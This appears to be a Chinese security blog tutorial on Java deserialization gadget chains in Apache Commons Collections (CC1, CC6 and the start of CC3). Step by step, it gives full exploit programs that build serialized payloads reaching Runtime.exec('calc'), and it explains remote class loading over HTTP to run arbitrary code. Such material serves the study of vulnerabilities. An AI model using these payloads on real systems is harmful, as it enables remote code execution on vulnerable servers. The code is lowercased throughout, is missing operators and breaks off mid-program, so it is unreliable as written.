java反序列化之cc调用链过程1-ag真人国际厅网站

反序列化漏洞原理:

写了一个流程图可供理解:

版本:jdk8u65版本(从jdk8u71开始,就有漏洞修复了)

详细配置信息见:

commonscollections1:

利用点:

commons-collections包下面有一个transformer类:

可以看到它主要的用途就是接收一个对象,然后调用transform方法对对象进行操作

于是我们来找一下transformer的实现类都有哪些:

失败利用:

我们来看一下noptransformer对应的内容是否有我们能够利用的点:

public class noptransformer implements transformer, serializable { /**  * transforms the input to result by doing nothing.  *   * @param input the input object to transform  * @return the transformed result which is the input  */ public object transform(object input) { return input; } } 

可以发现它对应的构造方法只是返回了input的值,并没有什么用,这里我们就利用不了。

再来看一下constanttransformer:

public class constanttransformer implements transformer, serializable { private final object iconstant; public object transform(object input) { return iconstant; } 

可以发现返回的是一个常量,也没有什么作用。

危险利用类:

  • 我们可以发现这里接收一个对象,然后进行反射调用,然后对应的方法,参数类型,以及参数都是我们可控的,这里就非常符合我们反序列化漏洞里面的标准:任意方法调用
public class invokertransformer implements transformer, serializable { /**  * transforms the input to result by invoking a method on the input.  *   * @param input the input object to transform  * @return the transformed result, null if null input  */ public invokertransformer(string methodname, class[] paramtypes, object[] args) { super(); imethodname = methodname; iparamtypes = paramtypes; iargs = args; } public object transform(object input) { if (input == null) { return null; } try { class cls = input.getclass(); method method = cls.getmethod(imethodname, iparamtypes); return method.invoke(input, iargs); ... 

利用验证:

我们知道rce的命令对应的是

runtime.getruntime().exec("calc"); 

然后反射对应的是:

runtime r = runtime.getruntime();//单例模式,通过对应方法创建对象 class c = runtime.class; method execmethod = c.getmethod("exec",string.class); execmethod.invoke(r,"calc"); 

因为我们发现的invokertransformer能够通过反射来调用方法,所以我们尝试能不能用invokertransformer里面的transform来执行命令

package exp; import org.apache.commons.collections.functors.invokertransformer; import java.lang.reflect.method; public class cc1test { public static void main(string[] args) throws exception{ // runtime.getruntime().exec("calc");命令执行对应的命令; runtime r = runtime.getruntime();//单例模式,通过对应方法创建对象 // class c = runtime.class; // method execmethod = c.getmethod("exec",string.class); // execmethod.invoke(r,"calc"); // 危险类利用测试:我们先调用invokertransformer的类,传入对应的参数,再找到对应的构造函数 // public invokertransformer(string methodname, class[] paramtypes, object[] args)//传参对应的是规定类型的数组,用来存放参数类型和参数值,所以我们要用它给的形式来进行传参; new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}).transform(r); } } 

调用链:

后半条链:

  • 我们已经找到了invokertransformer.transform中能够调用危险方法,所以我们就需要往前找一个能调用transform的类:
  • 这里我们要找的就是对应的不同名字调用transform,这样我们就能再往前找不同的类,所以这里transform调用transform的就没有很大的价值了
  • 然后我们找到了这样一个地方来进行transform的调用,如果valuetransformer能够控制为我们的invokertransformer,我们就可以利用checksetvalue调用后面的危险方法:
  • 所以我们来跟进一下对应的valuetransformer
protected transformedmap(map map, transformer keytransformer, transformer valuetransformer) { super(map); this.keytransformer = keytransformer; this.valuetransformer = valuetransformer; } 
  • 因为我们发现transformedmap是一个protected方法,所以我们在他自己类中找哪个地方能够调用transformedmap
public static map decorate(map map, transformer keytransformer, transformer valuetransformer) { return new transformedmap(map, keytransformer, valuetransformer); } 
  • 通过这里我们就可以发现,对应的valuetransformer我们可控,可以通过tranformermap类中的decorate类传入invokertansformdmapchecksetvalue内部参数的问题解决了,我们就需要继续寻找调用链,找哪里能够调用checksetvalue:

  • 我们发现abstractlnputcheckedmapdecorator类其实对应的是transformedmap的父类:

public class transformedmap extends abstractinputcheckedmapdecorator implements serializable { 
static class mapentry extends abstractmapentrydecorator { /* the parent map */ private final abstractinputcheckedmapdecorator parent; protected mapentry(map.entry entry, abstractinputcheckedmapdecorator parent) { super(entry); this.parent = parent; } public object setvalue(object value) { value = parent.checksetvalue(value); return entry.setvalue(value); } } 
  • entry其实就是map遍历的时候的一个键值对,map其实我们可以类似理解为一个数组,我们通常把一个entry叫做键值对,这里就是一个遍历map的一个方法:
for(map.entry entry:map.entryset()){ entry.getvalue(); } 
  • 所以我们可以发现mapentry类中的setvalue方法其实就是map里面的setvalue方法,这是这里放到mapentry里面进行了重写,它继承了abstractmapentrydecorator这个类,这个类又引入了map.entry接口,还存在setvalue方法,所以我们只需要进行常用的map遍历,就可以调用setvalue方法,然后调用checksetvalue方法:
public abstract class abstractmapentrydecorator implements map.entry, keyvalue { /** the map.entry to decorate */ protected final map.entry entry; public abstractmapentrydecorator(map.entry entry) { if (entry == null) { throw new illegalargumentexception("map entry must not be null"); } this.entry = entry; } /**  * gets the map being decorated.  *   * @return the decorated map  */ protected map.entry getmapentry() { return entry; } //----------------------------------------------------------------------- public object getkey() { return entry.getkey(); } public object getvalue() { return entry.getvalue(); } public object setvalue(object object) { return entry.setvalue(object); } 

利用验证:

这里就能够测试一下到此为止我们的调用链是否成立:

package exp; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.map.transformedmap; import java.lang.reflect.method; import java.util.hashmap; import java.util.map; public class cc1test { public static void main(string[] args) throws exception{ //runtime.getruntime().exec("calc");命令执行对应的命令; runtime r = runtime.getruntime();//单例模式,通过对应方法创建对象 // class c = runtime.class; // method execmethod = c.getmethod("exec",string.class); // execmethod.invoke(r,"calc"); //危险类利用测试:我们先调用invokertransformer的类,传入对应的参数,再找到对应的构造函数 //public invokertransformer(string methodname, class[] paramtypes, object[] args)//传参对应的是规定类型的数组,用来存放参数类型和参数值,所以我们要用它给的形式来进行传参; invokertransformer invokertransformer = new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}); hashmap<object,object> map = new hashmap<>();//new一个map map.put("key","value");//对map进行赋值 map<object,object> transformedmap = transformedmap.decorate(map,null,invokertransformer); for(map.entry entry:transformedmap.entryset()){//将transformedmap传进去,会自动调用到父类里面的setvalue方法: entry.setvalue(r); } } } 

前半条链:

然后我们需要找到一个能够遍历map的方法,且能把transformedmap传进去,最好就是能够找到某个类的readobject里面遍历map时调用了setvalue

然后结果我们就找到了:

这里恰好是一个map.entry的形式,然后在遍历map以后使用了setvalue:

for (map.entry<string, object> membervalue : membervalues.entryset()) { string name = membervalue.getkey(); class membertype = membertypes.get(name); if (membertype != null) { // i.e. member still exists object value = membervalue.getvalue(); if (!(membertype.isinstance(value) || value instanceof exceptionproxy)) { membervalue.setvalue( new annotationtypemismatchexceptionproxy( value.getclass()  "["  value  "]").setmember( annotationtype.members().get(name))); } } } 

那我们就重点来关注这个annotationlnvocationhandler类中我们有什么可控的点,在他的构造函数中我们可以发现,map我们完全可控,那我们就可以将前面的transformedmap构造进去:

但是这里注意一点,这里没有表明public类,所以我们只能通过反射来进行获取:

package sun.reflect.annotation; class annotationinvocationhandler implements invocationhandler, serializable { private static final long serialversionuid = 6182022883658399397l; private final class extends annotation> type; private final map<string, object> membervalues; annotationinvocationhandler(class extends annotation> type, map<string, object> membervalues) { class[] superinterfaces = type.getinterfaces(); if (!type.isannotation() || superinterfaces.length != 1 || superinterfaces[0] != java.lang.annotation.annotation.class) throw new annotationformaterror("attempt to create proxy for a non-annotation type."); this.type = type; this.membervalues = membervalues; } 
package exp; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.map.transformedmap; import java.lang.reflect.method; import java.util.hashmap; import java.util.map; public class cc1test { public static void main(string[] args) throws exception{ //runtime.getruntime().exec("calc");命令执行对应的命令; runtime r = runtime.getruntime();//单例模式,通过对应方法创建对象 // class c = runtime.class; // method execmethod = c.getmethod("exec",string.class); // execmethod.invoke(r,"calc"); //危险类利用测试:我们先调用invokertransformer的类,传入对应的参数,再找到对应的构造函数 //public invokertransformer(string methodname, class[] paramtypes, object[] args)//传参对应的是规定类型的数组,用来存放参数类型和参数值,所以我们要用它给的形式来进行传参; invokertransformer invokertransformer = new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}); hashmap<object,object> map = new hashmap<>();//new一个map map.put("key","value");//对map进行赋值 map<object,object> transformedmap = transformedmap.decorate(map,null,invokertransformer); class c = class.forname("sun.reflect.annotation.annotationinvocationhandler"); constructor annotationinvocationhdlconstructor = c.getdeclaredconstructor(class.class,map.class); annotationinvocationhdlconstructor.setaccessible(true); object o = annotationinvocationhdlconstructor.newinstance(override.class,transformedmap); serialize(o); unserialize("ser.bin"); } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

exp问题:

runtime类不可实例化:

我们可以看到整条链子我们已经顺下来了,但是我们最后传入的r = runtime.getruntime()并没有serializable接口,不能够序列化,所以这里我们要进行反射调用,从runtime的class属性入手进行反射

class c = runtime.class; method getruntimemethod = c.getmethod("getruntime",null); runtime r = (runtime) getruntimemethod.invoke(null,null); method execmethod = c.getmethod("exec",string.class); execmethod.invoke(r,"calc"); 

然后我们来转化一下,用invokertransformer类中的transform方法来进行构造:

public object transform(object input) { if (input == null) { return null; } try { class cls = input.getclass(); method method = cls.getmethod(imethodname, iparamtypes); return method.invoke(input, iargs); } 
method getruntimemethod = (method) new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}).transform(runtime.class);//获取runtime.getruntime方法 runtime r = (runtime) new invokertransformer("invoke",new class[]{object.class,object.class},new object[]{}).transform(getruntimemethod);//调用runtime.getruntime方法从而实例化runtime类 invokertransformer invokertransformer = new invokertransformer("exec",new class[]{string.class},new object[]{"calc"});// invokertransformer.transform(r); 

然后我们还可以调用链式结构来优化这个代码:

public chainedtransformer(transformer[] transformers) { super(); itransformers = transformers; } /**  * transforms the input to result via each decorated transformer  *   * @param object the input object passed to the first transformer  * @return the transformed result  */ public object transform(object object) { for (int i = 0; i < itransformers.length; i  ) { object = itransformers[i].transform(object); } return object; } 
transformer[] transformers = new transformer[]{ new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}), new invokertransformer("invoke",new class[]{object.class,object.class},new object[]{}), new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); chainedtransformer.transform(runtime.class); 

if判断进入setvalue

我们在annotationvocationhandler类中的if下断点,我们可以发现membertype在这里识别为null,我们就无法进入if语句从而导致无法调用setvalue方法:

我们可以看一下调试的结果:

string name = membervalue.getkey(); class membertype = membertypes.get(name); 

通过查找membervalue里面,先获取他的键值,对应的就是transformedmap里面对应的map,然后再用map中的key当作name查找对应membertype里面的函数名。

hashmap<object,object> map = new hashmap<>();//new一个map map.put("key","value");//对map进行赋值 map<object,object> transformedmap = transformedmap.decorate(map,null,invokertransformer); 

所以这里我们就要找到一个有函数名的注释类,然后将map中的key改成对应的函数名称:

hashmap<object,object> map = new hashmap<>(); map.put("value","aaa"); map<object,object> transformedmap = transformedmap.decorate(map,null,chainedtransformer); class c = class.forname("sun.reflect.annotation.annotationinvocationhandler"); constructor annotationinvocationhdlconstructor = c.getdeclaredconstructor(class.class,map.class); annotationinvocationhdlconstructor.setaccessible(true); object o = annotationinvocationhdlconstructor.newinstance(target.class,transformedmap); serialize(o); unserialize("ser.bin"); 

再进行一次调试我们就发现能够进入if语句了:

transform中value设置:

我们发现setvalue里面并不是我们想要传的值

我们步入看一下最后value对应的什么值:

所以这里需要修改这个值:

这里我们调用这个地方我们可以发现,不管最后transform是什么值,都会返回对应的constant值,所以我们就可以把runtime设为这个固定值。

public constanttransformer(object constanttoreturn) { super(); iconstant = constanttoreturn; } public object transform(object input) { return iconstant; } 
transformer[] transformers = new transformer[]{ new constanttransformer(runtime.class), new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}), new invokertransformer("invoke",new class[]{object.class,object.class},new object[]{}), new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); 

这样我们最后的value就固定为runtime.class了

exp(cc1transformedmap):

package exp; import org.apache.commons.collections.transformer; import org.apache.commons.collections.functors.chainedtransformer; import org.apache.commons.collections.functors.constanttransformer; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.map.transformedmap; import java.io.fileinputstream; import java.io.ioexception; import java.io.objectinputstream; import java.io.fileoutputstream; import java.io.ioexception; import java.io.objectoutputstream; import java.lang.annotation.target; import java.lang.reflect.constructor; import java.lang.reflect.method; import java.util.hashmap; import java.util.map; public class cc1test { public static void main(string[] args) throws exception{ // runtime r = runtime.getruntime();//单例模式,通过对应方法创建对象//问题一:r不能序列化,没有继承序列化接口 // class c = runtime.class; // method execmethod = c.getmethod("exec",string.class); // execmethod.invoke(r,"calc"); // class c = runtime.class; // method getruntimemethod = c.getmethod("getruntime",null); // runtime r = (runtime) getruntimemethod.invoke(null,null); // method execmethod = c.getmethod("exec", string.class); // execmethod.invoke(r,"calc"); // method getruntimemethod = (method) new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}).transform(runtime.class); // runtime r = (runtime) new invokertransformer("invoke",new class[]{object.class,object.class},new object[]{}).transform(getruntimemethod); // invokertransformer invokertransformer = new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}); transformer[] transformers = new transformer[]{ new constanttransformer(runtime.class), new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}), new invokertransformer("invoke",new class[]{object.class,object[].class},new object[]{null,null}), new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); // chainedtransformer.transform(runtime.class); // invokertransformer invokertransformer = new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}); hashmap<object,object> map = new hashmap<>(); map.put("value","aaa"); map<object,object> transformedmap = transformedmap.decorate(map,null,chainedtransformer); class c = class.forname("sun.reflect.annotation.annotationinvocationhandler"); constructor annotationinvocationhdlconstructor = c.getdeclaredconstructor(class.class,map.class); annotationinvocationhdlconstructor.setaccessible(true); object o = annotationinvocationhdlconstructor.newinstance(target.class,transformedmap); serialize(o); unserialize("ser.bin"); } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

exp(cc1lazymap):

在调用tranforms方法时候,除了能利用transformedmap来进行调用,还可以通过使用lazymap中的get方法来进行调用,然后再从annotationinvocationhandlerinvoke方法中调用lazymap中的get方法,再通过readobject里面调用代理类代理触发annotationinvocation类中的invoke方法:

package exp; import org.apache.commons.collections.transformer; import org.apache.commons.collections.functors.chainedtransformer; import org.apache.commons.collections.functors.constanttransformer; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.map.lazymap; import org.apache.commons.collections.map.transformedmap; import java.io.fileinputstream; import java.io.ioexception; import java.io.objectinputstream; import java.io.fileoutputstream; import java.io.ioexception; import java.io.objectoutputstream; import java.lang.annotation.target; import java.lang.reflect.constructor; import java.lang.reflect.invocationhandler; import java.lang.reflect.method; import java.lang.reflect.proxy; import java.util.hashmap; import java.util.map; public class cc1test { public static void main(string[] args) throws exception{ // runtime r = runtime.getruntime();//单例模式,通过对应方法创建对象//问题一:r不能序列化,没有继承序列化接口 // class c = runtime.class; // method execmethod = c.getmethod("exec",string.class); // execmethod.invoke(r,"calc"); // class c = runtime.class; // method getruntimemethod = c.getmethod("getruntime",null); // runtime r = (runtime) getruntimemethod.invoke(null,null); // method execmethod = c.getmethod("exec", string.class); // execmethod.invoke(r,"calc"); // method getruntimemethod = (method) new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}).transform(runtime.class); // runtime r = (runtime) new invokertransformer("invoke",new class[]{object.class,object.class},new object[]{}).transform(getruntimemethod); // invokertransformer invokertransformer = new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}); transformer[] transformers = new transformer[]{ new constanttransformer(runtime.class), new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}), new invokertransformer("invoke",new class[]{object.class,object[].class},new object[]{null,null}), new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); // chainedtransformer.transform(runtime.class); // invokertransformer invokertransformer = new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}); // hashmap map = new hashmap<>(); // map.put("value","aaa"); // map transformedmap = transformedmap.decorate(map,null,chainedtransformer); // for(map.entry entry:transformedmap.entryset()){ // entry.setvalue(r); // } // class c = class.forname("sun.reflect.annotation.annotationinvocationhandler"); // constructor annotationinvocationhdlconstructor = c.getdeclaredconstructor(class.class,map.class); // annotationinvocationhdlconstructor.setaccessible(true); // object o = annotationinvocationhdlconstructor.newinstance(target.class,transformedmap); //设置chainedtransformer在lazymap中的值 hashmap<object,object> map = new hashmap<>(); map<object,object> lazymap = lazymap.decorate(map,chainedtransformer); class c = class.forname("sun.reflect.annotation.annotationinvocationhandler"); constructor annotationinvocationhdlconstructor = c.getdeclaredconstructor(class.class,map.class); annotationinvocationhdlconstructor.setaccessible(true); invocationhandler h = (invocationhandler) annotationinvocationhdlconstructor.newinstance(target.class,lazymap); //动态代理 map mapproxy = (map) proxy.newproxyinstance(lazymap.class.getclassloader(),new class[]{map.class},h); object o = annotationinvocationhdlconstructor.newinstance(override.class,mapproxy); serialize(o); unserialize("ser.bin"); } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

commonscollections6:

调用链:

cc1在jdk的包更新到8u71以后,就对漏洞点进行了修复(cc1transformedmap链去掉了map.entrysetvalue方法)(cc1lazymap使用了put对类进行传参),因为反序列化不仅对类有依赖,还对外部的cc库,以及jdk版本有依赖,所以这里cc1就并不那么兼容,就引入了cc6不受jdk版本的限制:

cc6中引用了hashmap来进行反序列化链子的构造,通过hashmap里面的readobject方法来调用里面的put方法,然后调用hash方法最后调用hashcode方法,如果从hashcode里面能找到的一个调用get的链,就成功了,这样就不会受到jdk版本的限制:

然后我们在tiedmapentry中找到了hashcode方法,然后调用getvalue()方法,然后再通过map调用lazymap中的get方法

public int hashcode() {  object value = getvalue();  return (getkey() == null ? 0 : getkey().hashcode()) ^  (value == null ? 0 : value.hashcode());   } 
private final map map; public tiedmapentry(map map, object key) {  super();  this.map = map;  this.key = key;  } public object getvalue() {  return map.get(key); } 

所以这里我们将tiedmapentry实例化以后,传入对应的map值为实例化以后的lazymap,然后再通过hashmap中的put方法将tiedmapentry传入。

exp问题:

package exp; import org.apache.commons.collections.transformer; import org.apache.commons.collections.functors.chainedtransformer; import org.apache.commons.collections.functors.constanttransformer; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.keyvalue.tiedmapentry; import org.apache.commons.collections.map.lazymap; import java.io.*; import java.util.hashmap; import java.util.map; public class cc6test { public static void main(string[] args) throws exception{ transformer[] transformers = new transformer[]{ new constanttransformer(runtime.class), new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}), new invokertransformer("invoke",new class[]{object.class,object[].class},new object[]{null,null}), new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); hashmap<object,object> map = new hashmap<>(); map<object,object> lazymap = lazymap.decorate(map,chainedtransformer); tiedmapentry tiedmapentry = new tiedmapentry(lazymap,"aaa"); hashmap<object,object> map2 = new hashmap<>(); map2.put(tiedmapentry,"bbb"); ; } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

问题一:

因为序列化我们没有必要让他进行命令执行,而hashmap中的put方法会直接调用下去,所以这里我们可以在序列化的时候破环链子的某一个参数,防止他命令执行,然后在执行完put以后再利用反射将参数改回来

这里将lazymap中对应参数factory要传入的chainedtransformer来进行替换,然后再通过反射将factory的值修改过来:

package exp; import org.apache.commons.collections.transformer; import org.apache.commons.collections.functors.chainedtransformer; import org.apache.commons.collections.functors.constanttransformer; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.keyvalue.tiedmapentry; import org.apache.commons.collections.map.lazymap; import java.io.*; import java.lang.reflect.field; import java.util.hashmap; import java.util.map; public class cc6test { public static void main(string[] args) throws exception{ transformer[] transformers = new transformer[]{ new constanttransformer(runtime.class), new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}), new invokertransformer("invoke",new class[]{object.class,object[].class},new object[]{null,null}), new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); hashmap<object,object> map = new hashmap<>(); map<object,object> lazymap = lazymap.decorate(map,new constanttransformer(1)); tiedmapentry tiedmapentry = new tiedmapentry(lazymap,"aaa"); hashmap<object,object> map2 = new hashmap<>(); map2.put(tiedmapentry,"bbb"); class c = lazymap.class; field factoryfied = c.getdeclaredfield("factory"); factoryfied.setaccessible(true); factoryfied.set(lazymap,chainedtransformer); serialize(map2); unserialize("ser.bin"); } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

问题二:

再进行反序列化我们发现还存在问题,断点调试的时候我们可以发现序列化的时候会进行一步key的操作:在序列化的过程中我们可以发现,if语句是可以进入的,会把tiedmapentry tiedmapentry = new tiedmapentry(lazymap,"aaa");中的key=“aaa”传入put,所以这里再进行反序列化的时候会因为存在key而进不去if语句从而无法调用到我们想要的factory.transform(key)方法。

所以我们就可以在put完以后将这个key:aaa删除,让他反序列化的时候还能够进入if语句:

lazymap.remove("aaa"); 

exp(cc6tiedmapentry):

package exp; import org.apache.commons.collections.transformer; import org.apache.commons.collections.functors.chainedtransformer; import org.apache.commons.collections.functors.constanttransformer; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.keyvalue.tiedmapentry; import org.apache.commons.collections.map.lazymap; import java.io.*; import java.lang.reflect.field; import java.util.hashmap; import java.util.map; public class cc6test { public static void main(string[] args) throws exception{ transformer[] transformers = new transformer[]{ new constanttransformer(runtime.class), new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}), new invokertransformer("invoke",new class[]{object.class,object[].class},new object[]{null,null}), new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); hashmap<object,object> map = new hashmap<>(); map<object,object> lazymap = lazymap.decorate(map,new constanttransformer(1)); tiedmapentry tiedmapentry = new tiedmapentry(lazymap,"aaa"); hashmap<object,object> map2 = new hashmap<>(); map2.put(tiedmapentry,"bbb"); lazymap.remove("aaa"); class c = lazymap.class; field factoryfied = c.getdeclaredfield("factory"); factoryfied.setaccessible(true); factoryfied.set(lazymap,chainedtransformer); serialize(map2); unserialize("ser.bin"); } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

commonscollections3:

cc3中使用了另外一种方式来进行攻击,在cc1和cc6中,我们可以发现是通过调用命令执行来进行攻击,而这里我们引入一个新的代码执行的方式,通过动态类加载,来进行加载恶意的代码进行攻击。

动态类加载:

我们首先来介绍一下动态类加载的流程,在classloader中使用loadclass进行加载:

字节码:

我们先来介绍一下什么是java中的字节码:

狭义:在p牛的java漫谈中提到java字节码其实仅仅指的是java虚拟机中执行使用的一类指令,通常被存储在.class文件当中,只要我们的代码能够在编译器中编译成class文件,就能够在jvm虚拟机中进行运行。

广义:所有能够恢复成一个类并在jvm虚拟机里加载的字节序列,都在问的探讨范围之内

urlclassloader任意类加载:

java的classloader是用来加载字节码文件最基础的方法, classloader 是什么呢?它就是一个“加载器”,告诉java虚拟机如何加载这个类。java默认的 classloader 就是根据类名来加载类,这个类名是类完整路径,如 java.lang.runtime 。

urlclassloader 实际上是我们平时默认使用的 appclassloader 的父类,所以,我们解释 urlclassloader 的工作过程实际上就是在解释默认的java类加载器的工作流程。

协议:file/http/jar

  • url未以斜杠 / 结尾,则认为是一个jar文件,使用 jarloader 来寻找类,即为在jar包中寻找.class文件
  • url以斜杠 / 结尾,且协议名是 file ,则使用 fileloader 来寻找类,即为在本地文件系统中寻找.class文件
  • url以斜杠 / 结尾,且协议名不是 file ,则使用最基础的 loader 来寻找类

我们看上面的三种情况可以发现,当协议不是 file 协议的情况下,最常见的就是 http 协议会使用loader来进行寻找类。 我们可以使用http协议来测试一下,看java是否能从远程http服务器上加载.class文件:

package com.govuln; import java.net.url; import java.net.urlclassloader; public class helloclassloader{ public static void main( string[] args ) throws exception{ url[] urls = {new url("http://localhost:8000/")}; urlclassloader loader = urlclassloader.newinstance(urls); class c = loader.loadclass("hello"); c.newinstance(); } } 

我们将hello.class程序放到服务器下面,然后我们发现运行代码能够成功请求到我们的 /hello.class 文件,并执行了文件里的字节码,输出了”hello world”。 所以,作为攻击者如果我们能够控制目标java classloader的基础路径为一个http服务器,则可以利用远程加载的方式执行任意代码了。

defineclass直接加载字节码:

我们通过调试其实可以发现,无论是加载什么文件,java在classloader中都会调用这几个函数进行类的加载:

(继承关系)classloader ->secureclassloader->urlclassloader->appclassloader

classloader.loadclass(不进行初始化) - > classloader.findclass(重写) - > classloader.defineclass(字节码加载类)

  • loadclass的作用是从已加载的类缓存、父加载器等位置寻找类(这里实际上是双亲委派机制),在前面没有找到的情况下,执行findclass
  • findclass的作用是根据基础url指定的方式来加载类的字节码,就像上一节中说到的,可能会在 本地文件系统、jar包或远程http服务器上读取字节码,然后交给defineclass
  • defineclass的作用是处理前面传入的字节码,将其处理成真正的java

所以可见,真正核心的部分其实是 defineclass,他决定了如何将一段字节流转变成一个java类,java 默认的 classloader#defineclass 是一个native方法,逻辑在jvmc语言代码中。

因为defineclass是一个protect类,所以我们需要通过反射来进行获取,然后再通过defineclass对字节码直接进行加载:

package classloadertest; import java.lang.reflect.method; import java.nio.file.files; import java.nio.file.path; import java.nio.file.paths; public class loadclasstest { public static void main(string[] args) throws exception { classloader cl = classloader.getsystemclassloader(); method defineclassmethod = classloader.class.getdeclaredmethod("defineclass",string.class,byte[].class, int.class, int.class); defineclassmethod.setaccessible(true); byte[] code = files.readallbytes(paths.get("d:\\temp\\classes\\test.class")); class c = (class) defineclassmethod.invoke(cl,"test",code,0,code.length); c.newinstance(); } } 

调用链:

因为defineclass并不是一个public方法,我们不能通过其他类来直接调用defineclass来直接对字节码进行加载,所以这里我们需要找到一个对defineclass重写以后public属性的地方,然后对他进行调用实现类加载,再进行类的初始化执行恶意代码:

然后我们再跟进一下这个default方法看类中在哪进行了调用,然后找到了这definetransletclasses的private类,然后我们再看一下哪里变成了public

然后我们就在templateslmpl中找到了三种方法,而其中的一种方法中就进行了一个newinstance()初始化操作,这样就可以让我们的类初始化然后执行恶意代码,不过这里依然是一个private方法,我们还需要找对应的public方法

然后我们就找到了这个public类:

所以这里我们来梳理一下调用链:

templateslmpl.newtransformer - > gettransletinstance - > defineclass - > newinstance() 又因为temlpatesimpl调用了序列化接口所以里面的属性值我们都能够进行控制直接通过反射来进行赋值 templatesimpl templates = new templatesimpl(); templates.newtransformer(); 

exp问题:

问题一:

对必要的值赋完以后的代码exp是这样:但发生了空指针的报错:

package exp; import com.sun.org.apache.xalan.internal.utils.objectfactory; import com.sun.org.apache.xalan.internal.xsltc.trax.templatesimpl; import com.sun.org.apache.xalan.internal.xsltc.trax.transformerfactoryimpl; import org.apache.commons.collections.transformer; import org.apache.commons.collections.functors.chainedtransformer; import org.apache.commons.collections.functors.constanttransformer; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.keyvalue.tiedmapentry; import org.apache.commons.collections.map.lazymap; import java.io.*; import java.lang.reflect.field; import java.nio.file.files; import java.nio.file.path; import java.nio.file.paths; import java.security.accesscontroller; import java.security.privilegedaction; import java.util.hashmap; import java.util.map; public class cc3test { public static void main(string[] args) throws exception{ templatesimpl templates = new templatesimpl(); //_name赋值,否则代码return中止 class tc = templates.getclass(); field namefield = tc.getdeclaredfield("_name"); namefield.setaccessible(true); namefield.set(templates,"aaa"); //private byte[][] _bytecodes = null;如果为null,报出异常; //同时满足这个loader.defineclass(_bytecodes[i]); //class defineclass(final byte[] b) { // return defineclass(null, b, 0, b.length); // } field bytecodefield = tc.getdeclaredfield("_bytecodes"); bytecodefield.setaccessible(true); //一维数组满足defineclass参数从而命令执行 byte[] code = files.readallbytes(paths.get("d://tomcat/cc/target/classes/exp/demo.class")); //二维数组满足: // private byte[][] _bytecodes = null;如果为null,报出异常; //同时满足这个loader.defineclass(_bytecodes[i]); byte[][] codes = {code}; bytecodefield.set(templates,codes); //避免_tfactory为空指针而报错 // templatesimpl.transletclassloader loader = (templatesimpl.transletclassloader) // accesscontroller.doprivileged(new privilegedaction() { // public object run() { // return new templatesimpl.transletclassloader(objectfactory.findclassloader(),_tfactory.getexternalextensionsmap()); // } // }); field tfactoryfield = tc.getdeclaredfield("_tfactory"); tfactoryfield.setaccessible(true); tfactoryfield.set(templates,new transformerfactoryimpl()); templates.newtransformer(); } public static void serialize(object obj) throws ioexception { objectoutputstream oos 